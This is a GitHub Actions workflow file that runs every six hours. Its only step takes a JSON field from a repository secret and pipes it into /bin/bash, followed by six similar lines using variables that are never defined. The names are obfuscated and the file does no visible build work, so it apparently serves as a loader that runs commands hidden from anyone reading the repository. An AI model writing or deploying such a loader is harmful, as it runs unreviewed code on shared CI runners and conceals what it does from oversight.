name: hehuchong1391

on:
  workflow_dispatch:
  schedule:
    - cron: '42 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hehuchong1391
        env:
          glft8: ${{ secrets.glft8 }}
        run: |
          echo $glft8 | jq -r .w67 | /bin/bash
          echo $pll7044 | jq -r .jh00 | /bin/bash
          echo $kqr40 | jq -r .iya76 | /bin/bash
          echo $g6129 | jq -r .qvd039 | /bin/bash
          echo $w569 | jq -r .gqhz7866 | /bin/bash
          echo $n7764 | jq -r .gxpp54490 | /bin/bash
          echo $qhu399 | jq -r .hn70349 | /bin/bash

